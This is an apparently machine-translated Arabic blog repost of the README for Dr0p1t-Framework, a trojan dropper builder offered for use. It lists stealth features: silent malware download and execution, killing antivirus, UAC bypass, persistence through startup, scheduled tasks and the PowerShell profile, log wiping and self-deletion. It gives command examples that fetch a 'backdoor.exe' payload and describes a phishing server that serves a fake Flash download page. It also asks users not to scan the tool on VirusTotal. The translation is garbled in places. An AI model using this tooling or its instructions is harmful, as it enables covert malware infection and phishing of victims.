Dr0p1t-Framework

هل سمعت عنها، والقطارات حصان طروادة؟ في انخفاض القصير هو نوع من أحصنة طروادة التي تنزل غيرها من البرامج الضارة وDr0p1t يعطيك الفرصة لخلق التخفي القطارة التي تتجاوز MOST مقابل ولدي الكثير من الحيل (ثق بي: D))
اقتراح تعديل

الميزات


+ خصائص قابلة للتنفيذ تم إنشاؤها:


حجم قابل للتنفيذ أصغر بالمقارنة مع قطارات أخرى ولدت بنفس الطريقة.
تحميل قابل للتنفيذ على النظام المستهدف وتنفيذها بصمت ..
وظيفة التدمير الذاتي بحيث القطارة سوف تقتل وحذف نفسها بعد الانتهاء من العمل
الهروب القرص الطب الشرعي عن طريق جعل جميع الملفات القطارة إنشاء والقطارة أيضا ينظف محتواه قبل الحذف
مسح سجل الأحداث بعد الانتهاء.

+ خصائص الإطار:


يعمل مع ويندوز، لينكس والآن لديها دعم أوسك (بفضل @ sm4sh3r)
ميزة Dr0p1t خادم (بيتا) حتى الآن يمكنك العمل من المتصفح معرفة كيفية العمل مع Dr0p1t-سيرفر
Dr0p1t-سيرفر لديها خيار احتيال (بيتا) انظر كيفية العمل مع Dr0p1t-سيرفر

+ الوحدات:

العثور على وقتل مكافحة الفيروسات قبل تشغيل البرامج الضارة.
القدرة على تعطيل واك.
القدرة على تشغيل البرامج الضارة الخاصة بك كمسؤول.
محاكاة ساخرة كاملة من خلال خداع رمز الملف والإرشاد إلى أي شيء تريده.
ملفات زيب دعم حتى الآن يمكنك ضغط الخاص بك للتنفيذ إلى ملف مضغوط قبل التحميل.
تشغيل ملف مخصص (دفعة | بويرشيل | فس) اخترته قبل تشغيل الملف القابل للتنفيذ
في تشغيل البرامج النصية بويرشيل فإنه يمكن تجاوز سياسة التنفيذ
باستخدام أوبس لضغط القطارة بعد إنشائه

+ وحدات الثبات:

إضافة قابل للتنفيذ بعد تحميله إلى بدء التشغيل.
إضافة قابل للتنفيذ بعد تحميله إلى جدولة المهام (واك لا يهم).
إضافة الملف إلى ملف تعريف المستخدم بويرشيل بحيث سيتم تحميل الملف الخاص بك وركض في كل مرة powerhell.exe تشغيل إذا كان غير موجود.

لقطات

على ويندوز


على لينوكس

على نظام التشغيل X

لا تزال لا اختبارها بشكل كامل! تحتاج إلى بعض المساهمين واختبار

قائمة المساعدة

أوسيج: Dr0p1t.py Malware_Url [أوبتيونس]

خيارات:
-h، --help تظهر هذه الرسالة المساعدة والخروج
-s إضافة البرامج الضارة الخاصة بك لبدء التشغيل (الثبات)
-t إضافة البرامج الضارة إلى جدولة المهام (الثبات)
-أ أضف رابطك إلى ملف تعريف المستخدم بويرشيل (الثبات)
-k قتل عملية مكافحة الفيروسات قبل تشغيل البرامج الضارة.
-b قم بتشغيل البرنامج النصي المجمع قبل تشغيل البرامج الضارة. تحقق من مجلد البرامج النصية
-p تشغيل هذا البرنامج النصي بويرشيل قبل تشغيل البرامج الضارة الخاصة بك. تحقق من مجلد البرامج النصية
-v تشغيل هذا البرنامج النصي فس قبل تشغيل البرامج الضارة الخاصة بك. تحقق من مجلد البرامج النصية
--runas تجاوز واك وتشغيل البرامج الضارة الخاصة بك كمسؤول
- سبوف محاكاة ساخرة الملف النهائي إلى التمديد الذي تختاره.
--zip أخبر Dr0p1t أن البرامج الضارة في الرابط مضغوط كما الرمز البريدي
--upx استخدم أوبس لضغط الملف النهائي.
--nouac محاولة لتعطيل واك على جهاز الضحية
-i استخدم الرمز إلى الملف النهائي. تحقق من مجلد الرموز.
--noclearevent أخبر الإطار لعدم مسح سجلات الحدث على الجهاز الهدف بعد الانتهاء.
--nocompile أخبر الإطار لعدم تجميع الملف النهائي.
--only32 تحميل البرامج الضارة الخاصة بك لأجهزة 32 بت فقط
--only64 تحميل البرامج الضارة الخاصة بك لأجهزة 64 بت فقط
-q البقاء تماما (لا راية)
-u التحقق من وجود تحديثات
-nd عرض أقل معلومات الإخراج

أمثلة

./Dr0p1t.py Malware_Url [أوبتيونس]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof بدف --zip

المتطلبات الأساسية

بيثون 2 أو بيثون 3.
الإصدار الموصى به ل بيثون 2 هو 2.7.x، الإصدار الموصى به ل بيثون 3 هو 3.5.x ولا تستخدم 3.6 لأنه غير معتمد حتى الآن من قبل بينزتالر
التبعيات اللازمة لينكس

ملائم

سيتم تثبيت الآخرين من ملف install.sh
ملاحظة: يجب أن يكون لديك وصول الجذر
التبعيات اللازمة للنوافذ
 
بذرة  

وحدات في windows_requirements.txt

التركيب


على لينوكس

جيت كلون https://github.com/D4Vinci/Dr0p1t-Framework.git
تشمود 777 -R Dr0p1t-فريميورك
سد Dr0p1t-فريميورك
سودو تشمود + x install.sh
./install.sh
بيثون Dr0p1t.py
على ويندوز (بعد تحميل زيب وفوق ضغط ذلك)
سد Dr0p1t-فريميورك-ماستر
بيثون -m بيب إنستال -r windows_requirements.txt
بيثون Dr0p1t.py
ملاحظة: في الثعبان 2.7 لم يكن لديك نقطة حتى تثبيته أولا من get-pip.py النصي [جوجل ذلك]

تم الاختبار في:

كالي لينوكس - سانا

أوبونتو 14.04-16.04 لتس
ويندوز 10 / 8.1 / 8
العمل مع Dr0p1t خادم

ملاحظة: الخادم لا يزال في الإصدار التجريبي ولها الكثير من الميزات لإضافة وأيضا تصميم أفضل [بحاجة إلى مصمم للمساهمة: D]

المتطلبات الأساسية

اتصال إنترنت مستقر.
ميناء 5000 لا تستخدم وجدار الحماية تكوين لعدم منع الاتصال منه
تركيب وتشغيل الخادم

على لينكس و ويندوز انها نفسها بعد تثبيت Dr0p1t عن طريق القيام الخطوات المذكورة أعلاه، تثبيت وحدات في server_requirements.txt باستخدام نقطة مثل:

بيثون -m بيب إنستال -r server_requirements.txt
الآن دعونا تشغيل البرنامج النصي الخادم:

بيثون Dr0p1t_Server.py
بعد تشغيل البرنامج النصي الخادم، وسوف تبدأ في الاستماع إلى كل اتصال القادمة إلى ميناء 5000 باستخدام قارورة.

الآن لاستخدام الخادم من جهازك مفتوح في المتصفح إما 127.0.0.1:5000 أو [إب الخاص بك]: 5000.

لفتحه من الأجهزة الأخرى في لان فتح [إب المحلي الخاص بك]: 5000 والأجهزة الأخرى في وان فتح [إب العالمي الخاص بك]: 5000 ولكن تأكد أولا أن قمت بتكوين جهاز التوجيه لإعادة توجيه منفذ 5000 اتصال لك.

بعد فتح صفحة خدمة سترى موقع ويب بسيط مع تصميم بسيط يطلب منك البيانات اللازمة انظر لقطات الخادم

ثم تقديم البيانات ثم سيتم التحقق من خلال بعض العمليات ثم سيتم إنشاء ملف إيكس وسيتم توجيهك إلى صفحة أقول لك وصلة احتيال.

بعد دخول الرابط سترى عملية احتيال لتحميل القطارة التي افتراضيا أدوبي فلاش تحميل الصفحة. لاستبدال عملية احتيال مع لك استبدال ملف "suc.html" المحتوى مع يدكم ولكن تذكر المتغيرات (لا إزالته).

لقطات شاشة الخادم



 لا توزيع المسح الضوئي (يرجى عدم مسح مع فيروس المجموع: 3)
لتحميل الادات من هنا

تعليقات

المشاركات الشائعة من هذه المدونة